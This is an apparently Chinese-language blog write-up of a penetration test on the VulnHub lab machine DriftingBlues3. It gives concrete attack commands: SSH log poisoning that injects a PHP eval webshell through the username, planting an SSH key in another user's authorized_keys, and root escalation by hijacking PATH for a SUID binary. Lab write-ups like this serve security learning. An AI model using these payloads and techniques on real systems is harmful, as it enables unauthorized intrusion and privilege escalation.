dirftingblue3靶机实战渗透测试

环境配置

靶机下载地址:https://download.vulnhub.com//driftingblues/driftingblues3.ova

靶机IP:172.16.9.173 攻击机IP:172.16.9.174

渗透过程

首先对靶机进行nmap扫描nmap -sV -p- 172.16.9.173

80端口开启,使用dirb工具对其目录进行扫描,并且访问其主页. dirb http://172.16.9.173/ 发现其主页没有什么线索,然后查看dirb扫描的结果 发现robots.txt和多个框架存在.然后逐一对其进行访问.

发现扫描的结果外,除了robots.txt中有有用信息,其他都是无用的信息,访问robots.txt中给出的文件** ssh 有问题约翰说：“有毒！！！远离！！！”idk 如果他有精神上的挑战请找到并修复它还要检查 /littlequeenofspades.html你的哥们哥(网页翻译大致为)网页有提到ssh和另一个页面,我们继续访问另一个页面/littlequeenofspades.html 一开始看到这个网页的时候,以为只是简单的提示,但是我选中CTRL+A进行全选的时候,居然发现了隐藏的base64加密的字符串.好家伙,我直接好家伙

选中base64的字符串进行解密.

解密完之后又出现了一个新的页面,访问这个页面发现是一个ssh的登陆日志

**尝试发现ssh登陆时哪些信息会显示在日志中,首先登陆ssh服务器ssh test@172.16.9.173 **发现test用户名会出现在日志中** **构造一句话木马<?php @eval($_POST[cmd]);?>登陆ssh服务器ssh '<?php @eval($_POST[cmd])'?>'@172.16.9.173 php一句话木马写入成功,尝试用蚁剑进行连接一句话木马.

提权普通用户

连接进入靶机.尝试提权,但是发现home目录下还有一个用户robertj,并且用户的家目录下有user.txt,猜测可能需要先获得这个用户的权限.然后发现robertj用户的.ssh目录是可以进入并且可读可写可执行 然后尝试ssh免密码登陆这个用户,将攻击机Kali的/root/authorized_keys文件内容复制进入/home/robertj/.ssh/authorized_keys中,即可实现ssh免密码登陆.

然后就可以用攻击机进行ssh连接.

成功登陆靶机之后,就可以查看到第一个user.txt

提权Root用户

**然后输入命令查看哪些命令有suid权限find / -user root -perm -4000 2>/dev/null **发现有一个很奇怪的命令为getinfo,尝试使用该命令,发现为ifconfig+cat /etc/hosts + uname -a,猜测提权的突破口在这里. **尝试利用getinfo进行提权** 创建一个名为IP的文件,然后赋予其777的权限,然后将环境变量移动到/home/robertj目录下,然后执行getinfo命令进行提权,这样执行getinfo的命令时,会以root的权限执行ip命令,我们就可以拿到root权限的shell**

提权命令 echo "/bin/bash" > ip chmod 777 ip export PATH=/home/robertj:$PATH

总结:

这个系列的靶机还是非常的有意思的!咱下个靶机driftingblue4再见!!! 欢迎大佬们指出小弟的不足!